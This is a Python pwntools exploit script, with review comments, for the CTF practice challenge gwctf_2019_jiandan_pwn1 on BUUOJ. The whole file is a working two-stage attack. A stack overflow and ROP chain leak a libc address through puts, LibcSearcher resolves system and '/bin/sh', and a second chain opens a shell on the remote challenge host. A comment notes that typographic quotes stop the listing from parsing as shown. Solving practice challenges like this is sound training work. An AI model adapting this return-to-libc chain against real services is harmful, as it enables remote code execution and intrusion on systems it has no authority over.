EXP
# Exploit script for the CTF practice challenge gwctf_2019_jiandan_pwn1 (BUUOJ).
#
# Flow as written: overflow a stack buffer, run a short ROP chain that calls
# puts(puts@got) to leak a libc address and returns to main, resolve
# system/"/bin/sh" from the leak via LibcSearcher, then send a second chain
# that calls system("/bin/sh").  Every constant below (padding length,
# gadget address, host/port) is specific to this binary and this challenge
# instance.
#
# NOTE(review): as rendered on this page the string delimiters are the
# typographic character ‘ (U+2018), which is not a valid Python quote; the
# listing does not parse until those are plain ASCII ' characters.
# pwntools and LibcSearcher are third-party packages, not stdlib.
from pwn import *
from LibcSearcher import *
# Verbose tube logging (every send/recv is printed); target is 64-bit Linux.
context(log_level = ‘debug‘,os = ‘linux‘,arch = ‘amd64‘)
# Local alternative kept for reference; the remote instance is used below.
#sh = process(‘./040-gwctf_2019_jiandan_pwn1‘)
sh = remote(‘node4.buuoj.cn‘, 27858)
# Static addresses are read from the binary; it is assumed to be non-PIE,
# otherwise these symbol/PLT/GOT values would not be usable as-is.
elf = ELF(‘./040-gwctf_2019_jiandan_pwn1‘)
# Hard-coded gadget address; presumably `pop rdi; ret` — confirm with a
# gadget finder if the binary is rebuilt.
pop_rdi = 0x400843
puts_got = elf.got[‘puts‘]
puts_plt = elf.plt[‘puts‘]
main_addr = elf.symbols[‘main‘]
# Stage 1: 0x10c bytes of filler, then a chain puts(puts_got) -> main.
# The single 0x18 byte between the filler and the chain is binary-specific
# (it overwrites one saved byte on the stack); its exact role is not evident
# from this script — verify against the stack layout before reusing.
payload1 = flat(b‘A‘*0x10c, b‘\x18‘, pop_rdi, puts_got, puts_plt, main_addr)
# NOTE(review): recent pwntools versions warn when given str instead of
# bytes here and on the recvuntil below; b‘...‘ is the safer form.
sh.sendlineafter(‘fun!\n‘, payload1)
# puts prints the 6 significant bytes of the address followed by '\n';
# drop the newline and zero-pad to 8 bytes before unpacking.
puts_addr = u64(sh.recvuntil(‘\n‘)[:-1].ljust(8, b‘\x00‘))
print(‘[+]puts_addr: ‘, hex(puts_addr))
# Identify the remote libc from the leaked puts address, then rebase the
# symbols of interest.  LibcSearcher may offer several candidate libcs and
# prompt interactively when the low 12 bits match more than one build.
ls = LibcSearcher(‘puts‘, puts_addr)
system_addr = puts_addr - ls.dump(‘puts‘) + ls.dump(‘system‘)
binsh_addr = puts_addr - ls.dump(‘puts‘) + ls.dump(‘str_bin_sh‘)
print(‘[+]system_addr: ‘, hex(system_addr))
print(‘[+]binsh_addr: ‘, hex(binsh_addr))
# Stage 2: same overflow layout, chain is system("/bin/sh").  No return
# address after system_addr, so the process is expected to end there.
payload2 = flat(b‘A‘*0x10c, b‘\x18‘, pop_rdi, binsh_addr, system_addr)
sh.sendlineafter(‘fun!\n‘, payload2)
# Hand the tube to the user once the shell is up.
sh.interactive()
040-gwctf_2019_jiandan_pwn1